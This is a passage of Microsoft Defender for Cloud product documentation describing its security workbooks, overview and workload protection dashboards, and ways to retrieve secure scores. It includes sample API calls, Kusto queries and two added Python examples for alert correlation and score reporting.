This table helps you triage the recommendations that have had the most resources changed to unhealthy over the selected period.


Graph: Scores for specific security controls
Defender for Cloud's security controls are logical groupings of recommendations. This chart shows you, at a glance, the weekly scores for all of your controls.


Graph: Resources changes
Recommendations with the most resources that have changed state (healthy, unhealthy, or not applicable) during the selected period are listed here. Select any recommendation from the list to open a new table listing the specific resources.


Use the ‘System Updates’ workbook 


This workbook is based on the security recommendation "System updates should be 
installed on your machines". 


The workbook helps you identify machines with outstanding updates. 
You can view the situation for the selected subscriptions according to: 


• The list of resources with outstanding updates
• The list of updates missing from your resources


[Screenshot: Microsoft Defender for Cloud | Workbooks | System Updates (Preview), showing the count of resources by health, the count of unhealthy machines by operating system, the count of missing updates by severity, and a 'Missing system updates' table with Update, Operating system, Severity and Affected machines columns]


Use the 'Vulnerability Assessment Findings’ workbook 


Defender for Cloud includes vulnerability scanners for your machines, containers in container registries, and SQL servers.


Learn more about using these scanners:


• Scan your ACR images for vulnerabilities
• Scan your ECR images for vulnerabilities
• Scan your SQL resources for vulnerabilities
• Find vulnerabilities with the integrated Qualys scanner
• Find vulnerabilities with Microsoft Defender Vulnerability Management


Findings for each resource type are reported in separate recommendations:


• Vulnerabilities in your virtual machines should be remediated (includes findings from Microsoft Defender Vulnerability Management, the integrated Qualys scanner, and any configured BYOL VA solutions)
• Container registry images should have vulnerability findings resolved
• SQL databases should have vulnerability findings resolved
• SQL servers on machines should have vulnerability findings resolved


This workbook gathers these findings and organizes them by severity, resource type, and category.


[Screenshot: Microsoft Defender for Cloud | Workbooks | Vulnerability Assessment Findings (Preview), showing vulnerabilities by category (Windows, Debian, Internet Explorer, RedHat, Security Policy, Security Solution Finding) and a findings table grouped by severity (High, Medium, Low) with description, patchable, category, resource, resource group, time generated and threat columns; the search box filters vulnerabilities by resource, resource group, CVE, severity, etc.]


Use the 'Compliance Over Time' workbook


Microsoft Defender for Cloud continually compares the configuration of your resources with requirements in industry standards, regulations, and benchmarks. Built-in standards include NIST SP 800-53, SWIFT CSP CSCF v2020, Canada Federal PBMM, HIPAA HITRUST, and more. You can select the specific standards relevant to your organization using the regulatory compliance dashboard. Learn more in Customize the set of standards in your regulatory compliance dashboard.


This workbook tracks your compliance status over time with the various standards you've added to your dashboard.


[Screenshot: Compliance Over Time (Preview) workbook overview, listing the selected standards (ISO 27001, PCI DSS 3.2.1, Azure Security Benchmark, AWS Foundational Security Best Practices, AWS PCI DSS 3.2.1, AWS CIS 1.2.0, SOC TSP, GCP-CIS-1.1.0) with their passed controls, passed controls % and 7-day change]


When you select a standard from the overview area of the report, the lower pane reveals a more detailed breakdown:


[Screenshot: Compliance Over Time workbook with a standard selected, showing the compliance trend chart per standard and the 'Changes for Azure-Security-Benchmark' table of main controls (Identity Management, Backup and Recovery, Network Security, Asset Management, Data Protection, Posture and Vulnerability Management, Endpoint Security, Logging and Threat Detection, Privileged Access, Incident Response) with passed controls, passed controls %, 7-day change and 30-day change]


You can keep drilling down - right down to the recommendation level - to view the 
resources that have passed or failed each control. 


Tip

For each panel of the report, you can export the data to Excel with the "Export to Excel" option.


[Screenshot: 'Changes for Azure-Security-Benchmark' table with the Export to Excel option, listing main controls with their passed controls, passed controls %, 7-day change and 30-day change]


Use the ‘Active Alerts’ workbook 


This workbook displays the active security alerts for your subscriptions on one dashboard. Security alerts are the notifications that Defender for Cloud generates when it detects threats on your resources. Defender for Cloud prioritizes and lists the alerts, along with the information needed for quick investigation and remediation.


This workbook helps you understand the active threats in your environment and prioritize between the active alerts.


Note

Most workbooks use Azure Resource Graph (ARG) to query their data. To display the Map View, however, a Log Analytics workspace is used to query the data, so continuous export should be enabled and configured to export the security alerts to that Log Analytics workspace.


You can view the active alerts by severity, resource group, or tag. 


[Screenshot: Active Alerts workbook showing counts of active alerts by Severity (Low, Medium, High), by Resource Group and by Tag]


You can also view your subscription's top alerts by attacked resources, alert types, and new alerts.


[Screenshot: 'Top 5 attacked resources (with High Severity)' table with ResourceId and Count columns]


You can get more details on any of these alerts by selecting it. 


[Screenshot: Active Alerts tables listing sample alerts with Severity, AlertDisplayName, IsIncident, Status, Tactics, SeverityRank, SubscriptionId, ResourceGroup, location and ResourceId columns, a 'Top alert types' table with AlertDisplayName and Count, and a 'New Alerts (Since last 24hrs)' table]


The MITRE ATT&CK tactics display by the order of the kill-chain, and the number of 
alerts the subscription has at each stage. 
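As an added example that is not part of Microsoft's documentation or of the workbook itself, the following Python models two things this page describes: the correlation rules behind the "Security incident detected ..." alerts in the reference table earlier on the page (two or more alerts from different plans on the same resource, from the same IP address, on the same user or service principal, or sharing a process, listed in chronological order), and the kill-chain ordering of alert counts by MITRE ATT&CK tactic shown in the Active Alerts workbook. The alert records are constructed; the Plan, Principal and ProcessId fields and the KILL_CHAIN order are assumptions, not the exported SecurityAlert schema.

```python
"""Correlate Defender for Cloud alerts into incidents and count alerts per
MITRE ATT&CK tactic in kill-chain order (added example, not Microsoft code).
Column names follow the workbook tables on this page; the Plan, Principal
and ProcessId fields, the KILL_CHAIN order and every alert are constructed."""
from collections import Counter, defaultdict
from datetime import datetime

SEVERITY_RANK = {"Low": 1, "Medium": 2, "High": 3}

# Assumed kill-chain display order for the tactic chart; tactics outside
# this list (e.g. "Unknown") are shown in an "Other" bucket at the end.
KILL_CHAIN = [
    "PreAttack", "InitialAccess", "Execution", "Persistence",
    "PrivilegeEscalation", "DefenseEvasion", "CredentialAccess", "Discovery",
    "LateralMovement", "Collection", "CommandAndControl", "Exfiltration",
    "Impact",
]

# The correlation keys the incident descriptions on this page mention,
# each mapped to the (assumed) alert field that carries that value.
CORRELATION_KEYS = {
    "same resource": "ResourceId",
    "same IP address": "SourceIp",
    "same user or service principal": "Principal",
    "shared process": "ProcessId",
}


def alert(alert_id, name, plan, severity, tactic, time, **entities):
    """Build a constructed alert record; entities are ResourceId, SourceIp,
    Principal and ProcessId, given only where the alert carries them."""
    record = {"AlertId": alert_id, "AlertDisplayName": name, "Plan": plan,
              "Severity": severity, "Tactics": tactic, "TimeGenerated": time}
    record.update(entities)
    return record


# Constructed sample alerts from several Defender for Cloud plans.
SAMPLE_ALERTS = [
    alert("a1", "Suspicious authentication activity", "Servers", "Medium",
          "PreAttack", "2023-07-24T10:00:00",
          ResourceId="vm-web-01", SourceIp="203.0.113.10"),
    alert("a2", "Suspicious process executed", "Servers", "High",
          "Execution", "2023-07-24T10:05:00",
          ResourceId="vm-web-01", ProcessId="vm-web-01/0x1574"),
    alert("a3", "Access from a suspicious IP address to a storage blob",
          "Storage", "Medium", "InitialAccess", "2023-07-24T10:20:00",
          ResourceId="stgacct01", SourceIp="203.0.113.10", Principal="svc-backup"),
    alert("a4", "Fileless attack technique detected", "Endpoint", "High",
          "DefenseEvasion", "2023-07-24T10:08:00",
          ResourceId="vm-web-01", ProcessId="vm-web-01/0x1574"),
    alert("a5", "Failed brute force attack", "Servers", "Low",
          "PreAttack", "2023-07-24T09:50:00",
          ResourceId="vm-db-02", SourceIp="198.51.100.7"),
    alert("a6", "Suspicious resource deployment", "Resource Manager", "Medium",
          "Unknown", "2023-07-24T10:40:00", Principal="svc-backup"),
]


def correlate(alerts, keys=CORRELATION_KEYS):
    """Group alerts into incidents the way the page describes: two or more
    alerts from different plans that share a correlation key, listed in
    chronological order, with the incident severity taken from the highest
    alert severity in the group."""
    incidents, seen = [], set()
    for label, field in keys.items():
        groups = defaultdict(list)
        for a in alerts:
            if a.get(field):
                groups[a[field]].append(a)
        for value, members in groups.items():
            plans = {m["Plan"] for m in members}
            if len(members) < 2 or len(plans) < 2:
                continue  # one alert, or alerts from a single plan, is no incident
            signature = frozenset(m["AlertId"] for m in members)
            if signature in seen:
                continue  # the same alert set was already correlated via another key
            seen.add(signature)
            members.sort(key=lambda m: datetime.fromisoformat(m["TimeGenerated"]))
            incidents.append({
                "reason": f"{label} ({value})",
                "severity": max((m["Severity"] for m in members),
                                key=SEVERITY_RANK.__getitem__),
                "plans": sorted(plans),
                "alerts": [m["AlertId"] for m in members],
                "tactics": [m["Tactics"] for m in members],
            })
    return incidents


def tactic_counts(alerts):
    """Count alerts per tactic, ordered along the kill chain like the
    'MITRE ATT&CK tactics' chart in the Active Alerts workbook."""
    counts = Counter(a["Tactics"] if a["Tactics"] in KILL_CHAIN else "Other"
                     for a in alerts)
    return [(t, counts[t]) for t in KILL_CHAIN + ["Other"] if t in counts]
```

Calling correlate(SAMPLE_ALERTS) yields four incidents (one per correlation key), and tactic_counts(SAMPLE_ALERTS) gives the per-stage counts with the 'Unknown' tactic bucketed under 'Other'.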


[Screenshot: 'MITRE ATT&CK tactics' chart showing the number of alerts at each stage, for example PreAttack, InitialAccess, PrivilegeEscalation, CommandAndControl, Exfiltration and Other]


You can see all of the active alerts in a table with the ability to filter by columns. Select an alert and the Open Alert View button appears.


[Screenshot: Active Alerts list view with Resource, Severity, ResourceGroup, AlertName and Tag filters, and a table of alerts with Severity, AlertDisplayName, IsIncident, Tactics, SubscriptionId, ResourceGroup and tags columns; results are limited to the first 250 rows]


By selecting the Open Alert View button, you can see all the details of that specific alert. 


[Screenshot: Security alert details page for the sample alert 'Detected Petya ransomware indicators' (High severity, affected resource Sample-VM in the DEMO subscription), with the alert description, MITRE ATT&CK tactics (Execution), alert details such as compromised host, suspicious process ID, suspicious command line and suspicious process, related entities (Account, File, Host, Host logon session, Process), and a Take action tab]


By selecting Map View, you can also see all alerts based on their location. 


[Screenshot: Active Alerts workbook Map View. The workbook notes that to see more information about the alerts in the map view you configure continuous export to export your security alerts to a Log Analytics workspace and then choose that workspace in the "Workspace" filter; the map shows alert counts per location, for example Central US, West US, East US 2, East US, North Europe and West Europe]


Select a location on the map to view all of the alerts for that location.


[Screenshot: Map View with a location (North Europe) selected, listing the alerts for that location with ResourceId, AlertDisplayName and SubscriptionId columns and an Open Alert View button]


You can see the details for that alert with the Open Alert View button. 


Use the 'DevOps Security (Preview)' workbook 


This workbook provides a customizable data analysis and gives you the ability to create 
visual reports. You can use this workbook to view insights into your DevOps security 
posture in coordination with Defender for DevOps. This workbook allows you to 
visualize the state of your DevOps posture for the connectors you've configured in 
Defender for Cloud, code, dependencies, and hardening. You can then investigate 
credential exposure, including types of credentials and repository locations. 


[Screenshot: DevOps Security workbook, Overview tab. Tabs: Overview, Secrets, Code, OSS Vulnerabilities, Infrastructure as Code, Posture. Tiles: Exposed secrets (High: 16) with Exposed secrets by repo (Microsoft.Security, Toy-Website); Code security (Medium: 393) with Code vulnerabilities by repo (RS1312, Microsoft Security, DemoRS2311, DfDDemo); DevOps security (39 / 28) with DevOps vulnerabilities by repo (RS1312, DfDDemo, DemoRS2311, ContainerScanning, DfD Playground, Toy-Website).]

Note

You must have a GitHub connector or a DevOps connector connected to your environment in order to use this workbook.


To deploy the workbook:

1. Sign in to the Azure portal.

2. Navigate to Microsoft Defender for Cloud > Workbooks.

3. Select the DevOps Security (Preview) workbook.

The workbook will load and show you the Overview tab, where you can see the number of exposed secrets, code security findings and DevOps security findings. All of these findings are broken down by total for each repository and by severity.


Select the Secrets tab to view the count by secret type. 


[Screenshot: Secrets tab. Count by secret type: 22. A Secret scanning table lists repositories and their status, for example peter-test-deps (Unhealthy) and Microsoft.Security (Unhealthy).]


The Code tab displays your count of findings by tool and repository and your code scanning findings by severity.


[Screenshot: Secrets and Code tabs of the DevOps Security workbook. Count by secret type: azure_storage_account_key 8, google_api_key 3, aws_secret_access_key 2, aws_access_key_id 2, azure_active_directory_application_secret 2; secret findings are listed by severity (High google_api_key, High azure_storage_account_key) and repository. Code tab: Count findings by tool (for example CodeQL and Unknown), Code scanning by severity grouped by repository (Microsoft.Security, DfDDemo, juice-shop-GHASDFD, peter-test-deps, RS1312), Count findings by repository, and a findings table with Severity, Status, Branch, RuleID, Finding and Details columns. An example finding reads: "A potential secret was detected. Validate file contains secrets, remove, rotate credential, and use approved store. For additional information on secret remediation see https://aka.ms/CredScan..."]
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The Open Source Security (OSS) Vulnerabilities tab displays your OSS vulnerabilities by 
severity and the count of findings by repository. 


[Screenshot: OSS Vulnerabilities tab showing OSS vulnerabilities by severity and Count findings by repository, with findings grouped by repository (Microsoft.Security 13, DfDDemo 25, juice-shop-GHASDFD 10, DemoRS2311 1) and columns Severity, Status, Summary, Package, Finding and Details.]
The Infrastructure as Code tab displays your findings by tool and repository. 
[Screenshot: Infrastructure as Code tab showing Findings by tool and Count findings by repository, with findings grouped by repository (ContainerScanning 4, juice-shop-GHASDFD 9, DfDDemo 7) and columns Severity, Status, Package, Finding and Details.]
The Posture tab displays your security posture by severity and repository. 


[Screenshot: Posture tab showing Security posture by severity and Posture assessments by repository, with assessments grouped by repository (RS1312, DemoRS2311, Sentinel-Content, ContainerScanning, demo-bootstrap, README; 2 each) and columns Visibility, Description, Status, Severity and Details.]


The Threats & Tactics tab displays the total count of threats and tactics, and the count by repository.


[Screenshot: Threats & Tactics tab showing Threats & tactics and Threats & tactics by repository, with columns Tactics, Techniques and Details, grouped by repository (DefenderForIOT 1, DemoRS2311 3, DfD Playground 1, DfDDemo 3, IOT-Sensor-On-Demand 1, Logingestion 1).]


Import workbooks from other workbook galleries


To move workbooks that you've built in other Azure services into your Microsoft 
Defender for Cloud workbooks gallery: 


1. Open the target workbook. 


2. From the toolbar, select Edit. 


[Screenshot: workbook toolbar with the Edit button.]


3. From the toolbar, select </> to enter the Advanced Editor.


[Screenshot: workbook toolbar in edit mode, with Done Editing and the </> Advanced Editor button.]


4. Copy the workbook's Gallery Template JSON. 




5. Open the workbooks gallery in Defender for Cloud and from the menu bar select New.


6. Select the </> to enter the Advanced Editor. 
7. Paste in the entire Gallery Template JSON. 
8. Select Apply. 


9. From the toolbar, select Save As. 


[Screenshot: workbook toolbar with the Save As button.]


10. Enter the required details for saving the workbook: 
a. A name for the workbook 
b. The desired region 
c. Subscription, resource group, and sharing as appropriate. 


You'll find your saved workbook in the Recently modified workbooks category. 


Next steps 


This article described Defender for Cloud's integrated Azure Workbooks page with built- 
in reports and the option to build your own custom, interactive reports. 


• Learn more about Azure Workbooks

• The built-in workbooks pull their data from Defender for Cloud's recommendations. Learn about the many security recommendations in Security recommendations - a reference guide


Microsoft Defender for Cloud's overview page

Article • 07/20/2023

Microsoft Defender for Cloud's overview page is an interactive dashboard that provides a unified view into the security posture of your hybrid cloud workloads. Additionally, it shows security alerts, coverage information, and more.


You can select any element on the page to get more detailed information. 


[Screenshot: Microsoft Defender for Cloud | Overview, showing 102 subscriptions. Left menu: General (Overview, Getting started, Recommendations, Attack path analysis, Security alerts, Inventory, Cloud Security Explorer, Workbooks, Community, Diagnose and solve problems), Cloud Security (Security posture, Regulatory compliance, Workload protections, Firewall Manager, DevOps security (preview)), Management (Environment settings, Security solutions, Workflow automation). Top bar: Subscriptions, What's new; 102 Azure subscriptions, 49 AWS accounts, 114 GCP projects; 36588 assessed resources; 370 active recommendations. Tiles: Security posture (Unassigned recommendations 237/244, Overdue recommendations 21/43, Attack paths; Secure score Azure 61%, AWS 28%; "Explore your security posture >"); Workload protections (Resource coverage 86%, "For full protection, enable 15 resource plans"; Alerts by severity over time; "Enhance your threat protection capabilities >"); Regulatory compliance (Microsoft cloud security benchmark, passed controls out of 63; lowest compliance regulatory standards by passed controls: AWS PCI DSS 3.2.1 Classic 0/40, AWS CIS 1.2.0 Classic 0/43, Reserve Bank of India IT Framework for NBFC 2/21; "Improve your compliance >"); Inventory (Unmonitored VMs 122, "To better protect your organization, we recommend installing agents"; Total Resources 36588: Unhealthy 14154, Healthy 15025, Not applicable 7409; "Explore your resources >").]


Features of the overview page 


[Screenshot: the overview page's top menu bar: Subscriptions, What's new, and the counts of Azure subscriptions, AWS accounts and GCP projects.]
The top menu bar offers: 


[Screenshot: the top menu bar's metrics (18236 assessed resources, active recommendations, attack paths and security alerts) and the Insights pane, with cards such as "Upgrade to new Defender CSPM plan" (Defender Cloud Security Posture Management provides enhanced posture capabilities and a cloud security graph to help identify, prioritize and reduce risk, in addition to the free foundational posture capabilities turned on by default), "Defender EASM" (discovers assets across first- and third-party internet-exposed infrastructure and identifies potential vulnerabilities and compliance risks for remediation) and "Defender for Cloud community" (join the community on GitHub to share knowledge, interact with other customers and experts, and provide feedback).]


• Subscriptions - You can view and filter the list of subscriptions by selecting this button. Defender for Cloud will adjust the display to reflect the security posture of the selected subscriptions.

• What's new - Opens the release notes so you can keep up to date with new features, bug fixes, and deprecated functionality.

• High-level numbers for the connected cloud accounts, showing the context of the information in the main tiles, and the number of assessed resources, active recommendations, and security alerts. Select the assessed resources number to access Asset inventory. Learn more about connecting your AWS accounts and your GCP projects.


Feature tiles 


The center of the page displays the feature tiles, each linking to a high profile feature or 
dedicated dashboard: 


• Security posture - Defender for Cloud continually assesses your resources, subscriptions, and organization for security issues. It then aggregates all the findings into a single score so that you can understand, at a glance, your current security situation: the higher the score, the lower the identified risk level. Learn more.

• Workload protections - This is the cloud workload protection platform (CWPP) integrated within Defender for Cloud for advanced, intelligent protection of your workloads running on Azure, on-premises machines, or other cloud providers. For each resource type, there's a corresponding Microsoft Defender plan. The tile shows the coverage of your connected resources (for the currently selected subscriptions) and the recent alerts, color-coded by severity. Learn more about the Defender plans.

• Regulatory compliance - Defender for Cloud provides insights into your compliance posture based on continuous assessments of your Azure environment. Defender for Cloud analyzes risk factors in your environment according to security best practices. These assessments are mapped to compliance controls from a supported set of standards. Learn more.

• Inventory - The asset inventory page of Microsoft Defender for Cloud provides a single page for viewing the security posture of the resources you've connected to Microsoft Defender for Cloud. All resources with unresolved security recommendations are shown in the inventory. If you've enabled the integration with Microsoft Defender for Endpoint and enabled Microsoft Defender for Servers, you'll also have access to a software inventory. The tile on the overview page shows you at a glance the total healthy and unhealthy resources (for the currently selected subscriptions). Learn more.


Insights 
The Insights pane offers customized items for your environment including:

• Actionable items to enhance your security.

• Tips to handle alerts and recommendations.

• Recommendations on how to upgrade your service to enhance your environment's protections.

• Recent blog posts by Microsoft Defender for Cloud experts.


Next steps 


This page introduced the Defender for Cloud overview page. For related information, 
see: 


• Explore and manage your resources with asset inventory and management tools

• Secure score in Microsoft Defender for Cloud


The workload protections dashboard 


Article • 02/27/2023


This dashboard provides:

• Visibility into your Microsoft Defender for Cloud coverage across your different resource types.

• Threat detection alerts.

• The onboarding state and agent installation.

• Links to configure advanced threat protection capabilities.

To access the workload protections dashboard, select Workload protections from the Cloud Security section of Defender for Cloud's menu.


What's shown on the dashboard? 


[Screenshot: Microsoft Defender for Cloud | Workload protections dashboard.]

The dashboard includes the following sections:

1. Microsoft Defender for Cloud coverage - Here you can see the resource types that are in your subscription and eligible for protection by Defender for Cloud. Wherever relevant, you can upgrade here as well. If you want to upgrade all possible eligible resources, select Upgrade all.

2. Security alerts - When Defender for Cloud detects a threat in any area of your environment, it generates an alert. These alerts describe details of the affected resources, suggested remediation steps, and in some cases an option to trigger a logic app in response. Selecting anywhere in this graph opens the Security alerts page.


3. Advanced protection - Defender for Cloud includes many advanced threat 
protection capabilities for virtual machines, SQL databases, containers, web 
applications, your network, and more. In this advanced protection section, you can 
see the status of the resources in your selected subscriptions for each of these 
protections. Select any of them to go directly to the configuration area for that 
protection type. 


4. Insights - This rolling pane of news, suggested reading, and high priority alerts 
gives Defender for Cloud's insights into pressing security matters that are relevant 
to you and your subscription. Whether it's a list of high severity CVEs discovered 
on your VMs by a vulnerability analysis tool, or a new blog post by a member of 
the Defender for Cloud team, you'll find it here in the Insights panel. 


Next steps 


In this article, you learned about the workload protections dashboard. 


Enable enhanced protections 


Learn more about the advanced protections provided by the Defender plans. 


Access and track your secure score 


Article • 01/09/2023


You can find your overall secure score, and your score per subscription, through the 
Azure portal or programmatically as described in the following sections: 


Tip

For a detailed explanation of how your scores are calculated, see Calculations - understanding your score.


Get your secure score from the portal 


Defender for Cloud displays your score prominently in the portal. When you select the Secure score tile on the overview page, you're taken to the dedicated secure score page, where you'll see the score broken down by subscription. Select a single subscription to see the detailed list of prioritized recommendations and the potential effect that remediating them will have on the subscription's score.

Your secure score is shown in the following locations in Defender for Cloud's portal pages.

• In a tile on Defender for Cloud's Overview (main dashboard):


[Screenshot: Defender for Cloud | Overview showing 73 subscriptions and 4 AWS accounts. Secure score tile: Unhealthy resources 4101 ("to harden these resources and improve your score, follow the security recommendations"), current secure score with completed controls and completed recommendations 24/110, "Improve your secure score >". Other tiles: Firewall Manager (5 firewalls, 3 firewall policies; network protection status by resource: virtual hubs 0/0, virtual networks 8/249); Workload protections (resource coverage, "For full protection, enable 11 resource plans", alerts by severity); Inventory (5984 total resources: Unhealthy 4101, Healthy 1435, Not applicable 448); 209 security alerts; 7336 active recommendations; Regulatory compliance (Azure Security Benchmark, 1 of 40 passed controls; lowest compliance regulatory standards: CMMC 0/55, NIST SP 800 53 R5 2/55, ISO 27001 1/20); Information protection (preview, integrated with Purview, resource scan coverage 1%). Insights pane: most prevalent recommendations by resources (Audit diagnostic setting 1025; Append a tag and its value to resources 549; Storage account should use a private link 447; Storage accounts should restrict network access 446); 145 new alerts detected by Defender for Cloud in the last 48 hours; controls with the highest potential increase (Remediate vulnerabilities +10%, Remediate security configurations +6%, another control +6%).]


• In the dedicated Secure score page you can see the secure score for your subscriptions and your management groups:


[Screenshot: Microsoft Defender for Cloud | Secure Score page showing 73 subscriptions. Overall Secure Score 47% (~27 of 58 points); subscriptions with the lowest scores: 35% (~11 of 31 points), Contoso Hotels 41% (~20 of 48 points), 43% (~14 of 33 points). The subscription list shows, for example, Contoso Dev_India 61% (25 of 41) and Contoso Hotels - Dev 53% (31 of 58), each with a "View recommendations >" link. A second view groups by management groups (1 management group, 5 subscriptions): a root group whose score shows as Restricted (2396 unhealthy of 5240 resources), Contoso (showing 5 of 5; 59 unhealthy of 145), IT (showing 2 of 2; 17 of 29), App Team (showing 2 of 2; 17 of 29), Contoso Dev_India 61% (25 of 41; 4 of 9), Contoso Dev_EUS 43% (14 of 33; 13 of 20), Infra Team (showing 0 of 0; Not applicable). The header reads: "Your Secure Score is a measure of the security posture of your subscription: the higher the score, the lower the identified risk level."]


Note

Any management groups for which you don't have sufficient permissions will show their score as "Restricted."


• At the top of the Recommendations page:


[Screenshot: Microsoft Defender for Cloud | Recommendations page (73 subscriptions) with a Download CSV report button. Secure Score 46% (~27 of 58 points). Recommendations status: 1 completed control of 15 total; 21 completed recommendations of 68 total. Controls with their potential score increase and unhealthy resources: Remediate vulnerabilities +10% (6 points), 56 of 59 resources; Enable encryption at rest +6% (4 points), 80 of 90 resources; Remediate security configurations +6% (3 points), 61 of 71 resources; Manage access and permissions +5% (3 points), 7 of 15 resources; Encrypt data in transit +5% (3 points), 55 of 83 resources; Apply adaptive application control +4% (3 points), 46 of 55 resources. Resource health: Unhealthy 198, Healthy 52, Not applicable 111 (361 total). Group by controls: On. A banner reads: "You have limited permissions to some of your subscriptions. You will not be able to receive Secure Score information for those subscriptions."]


Get your secure score from the REST API 


You can access your score via the secure score API. The API methods provide the flexibility to query the data and build your own reporting mechanism of your secure scores over time. For example, you can use the Secure Scores API to get the score for a specific subscription. In addition, you can use the Secure Score Controls API to list the security controls and the current score of your subscriptions.


Get single secure score 


Sample Request

HTTP

GET https://management.azure.com/subscriptions/20ff7fc3-e762-44dd-bd96-b71116dcdc23/providers/Microsoft.Security/secureScores/ascScore?api-version=2020-01-01-preview

Sample Response

Status code: 200

JSON

{
  "id": "/subscriptions/20ff7fc3-e762-44dd-bd96-b71116dcdc23/providers/Microsoft.Security/secureScores/ascScore",
  "name": "ascScore",
  "type": "Microsoft.Security/secureScores",
  "properties": {
    "displayName": "ASC score",
    "score": {
      "max": 13,
      "current": 3
    }
  }
}


For examples of tools built on top of the secure score API, see the secure score area of our GitHub community.
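The following Python script is an added example, not code from the Defender for Cloud documentation or from the Azure GitHub community. It builds the two request URLs (the secure score endpoint shown above and the secure score controls endpoint), validates the subscription ID before it is interpolated into the URL path, and reduces the responses to the figures the portal shows: the score as a percentage, and the controls ranked by potential score increase as on the Recommendations page. It runs offline on constructed sample data; `fetch_json` (a plain `urllib` GET with an ARM bearer token) is the only part that talks to the service. The controls response shape (`value[].properties.displayName`, `healthyResourceCount`, `unhealthyResourceCount`, `score.current`, `score.max`) follows the Secure Score Controls API reference and is an assumption of this example; the control names are taken from the page's screenshots, the counts and points are made up.

```python
"""Added example (not from the Defender for Cloud docs): build the secure score REST
requests and reduce their responses to what the portal shows. Assumptions (not on the
page): the controls endpoint is .../secureScores/ascScore/secureScoreControls and each
item has properties.displayName, healthy/unhealthyResourceCount and score.{current,max}."""
import json
import re
import urllib.request

API_VERSION = "2020-01-01"
GUID_RE = re.compile(r"^[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}$", re.I)


def secure_score_url(subscription_id: str, controls: bool = False) -> str:
    """URL for a subscription's secure score, or for its controls list.
    The ID is validated as a GUID before it is interpolated into the path."""
    if not GUID_RE.match(subscription_id):
        raise ValueError(f"not a subscription GUID: {subscription_id!r}")
    url = (f"https://management.azure.com/subscriptions/{subscription_id}"
           f"/providers/Microsoft.Security/secureScores/ascScore")
    if controls:
        url += "/secureScoreControls"
    return f"{url}?api-version={API_VERSION}"


def fetch_json(url: str, bearer_token: str) -> dict:
    """Online helper (not used offline): GET with an ARM access token, e.g. from
    `az account get-access-token --query accessToken -o tsv`."""
    req = urllib.request.Request(url, headers={"Authorization": f"Bearer {bearer_token}"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def score_summary(score_resp: dict) -> dict:
    """Subscription ID, points and percentage from a secureScores response."""
    s = score_resp["properties"]["score"]
    current, maximum = float(s["current"]), float(s["max"])
    return {"subscription": score_resp["id"].split("/")[2], "current": current,
            "max": maximum, "percentage": round(current / maximum * 100, 1)}


def controls_by_potential_increase(controls_resp: dict, subscription_max: float) -> list:
    """One row per control, like the Recommendations page: unhealthy resources and the
    points (and percent of the subscription's max) that fully remediating it would add."""
    rows = []
    for item in controls_resp["value"]:
        p = item["properties"]
        healthy = int(p.get("healthyResourceCount", 0))
        unhealthy = int(p.get("unhealthyResourceCount", 0))
        if healthy + unhealthy == 0:
            continue  # no applicable resources, nothing to remediate
        current, maximum = float(p["score"]["current"]), float(p["score"]["max"])
        gain = maximum - current
        rows.append({"control": p["displayName"], "unhealthy": unhealthy,
                     "current": current, "max": maximum, "potential_points": round(gain, 2),
                     "potential_percent": round(gain / subscription_max * 100, 1)})
    rows.sort(key=lambda r: r["potential_points"], reverse=True)
    return rows


def scores_consistent(score_resp: dict, controls_resp: dict) -> bool:
    """Sanity check: per-control current and max points must add up to the subscription's."""
    items = [i["properties"]["score"] for i in controls_resp["value"]]
    s = score_resp["properties"]["score"]
    return (abs(sum(float(i["current"]) for i in items) - float(s["current"])) < 0.01
            and abs(sum(float(i["max"]) for i in items) - float(s["max"])) < 0.01)


# Constructed sample: same shape and values as the page's sample response.
SCORE_RESPONSE = json.loads("""{
  "id": "/subscriptions/20ff7fc3-e762-44dd-bd96-b71116dcdc23/providers/Microsoft.Security/secureScores/ascScore",
  "name": "ascScore", "type": "Microsoft.Security/secureScores",
  "properties": {"displayName": "ASC score", "score": {"max": 13, "current": 3}}
}""")

# Constructed controls response: control names from the page's Recommendations
# screenshot; counts and scores are made up but add up to the 3 of 13 points above.
CONTROLS_RESPONSE = {"value": [
    {"properties": {"displayName": "Remediate vulnerabilities", "healthyResourceCount": 1,
                    "unhealthyResourceCount": 5, "score": {"max": 6, "current": 1.0}}},
    {"properties": {"displayName": "Enable encryption at rest", "healthyResourceCount": 1,
                    "unhealthyResourceCount": 1, "score": {"max": 4, "current": 2.0}}},
    {"properties": {"displayName": "Manage access and permissions", "healthyResourceCount": 0,
                    "unhealthyResourceCount": 7, "score": {"max": 3, "current": 0.0}}},
]}

if __name__ == "__main__":
    summary = score_summary(SCORE_RESPONSE)
    print(secure_score_url(summary["subscription"], controls=True))
    print(f"{summary['current']:.0f} of {summary['max']:.0f} points ({summary['percentage']}%)")
    for r in controls_by_potential_increase(CONTROLS_RESPONSE, summary["max"]):
        print(f"{r['control']:<32} +{r['potential_percent']}% ({r['potential_points']} pts), "
              f"{r['unhealthy']} unhealthy")
```

The consistency check mirrors the Resource Graph queries shown in the next section: summing the per-control current and max points should reproduce the subscription's secureScores figures, which is a cheap way to detect a partial or stale controls listing before you build reports on it. Note that the portal rounds both the percentage and the points it displays, so expect small differences between its "+6% (4 points)" labels and the unrounded values computed here.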


Get your secure score from Azure Resource Graph


Azure Resource Graph provides instant access to resource information across your cloud 
environments with robust filtering, grouping, and sorting capabilities. It's a quick and 
efficient way to query information across Azure subscriptions programmatically or from 
within the Azure portal. Learn more about Azure Resource Graph. 


To access the secure score for multiple subscriptions with Azure Resource Graph: 


1. From the Azure portal, open Azure Resource Graph Explorer. 


[Screenshot: Azure portal search bar with Resource Graph Explorer listed under Services.]


2. Enter your Kusto query (using the following examples for guidance). 


• This query returns the subscription ID, the current score in points and as a percentage, and the maximum score for the subscription.

Kusto

SecurityResources
| where type == 'microsoft.security/securescores'
| extend current = todouble(properties.score.current), max = todouble(properties.score.max)
| project subscriptionId, current, max, percentage = ((current / max) * 100)


• This query returns the status of all the security controls. For each control, you'll get the number of unhealthy resources, the current score, and the maximum score.

Kusto

SecurityResources
| where type == 'microsoft.security/securescores/securescorecontrols'
| extend SecureControl = properties.displayName, unhealthy = properties.unhealthyResourceCount, currentscore = properties.score.current, maxscore = properties.score.max
| project SecureControl, unhealthy, currentscore, maxscore


3. Select Run query. 


Tracking your secure score over time 


Secure Score Over Time report in workbooks page 


Defender for Cloud's workbooks page includes a ready-made report for visually tracking 
the scores of your subscriptions, security controls, and more. Learn more in Create rich, 
interactive reports of Defender for Cloud data. 


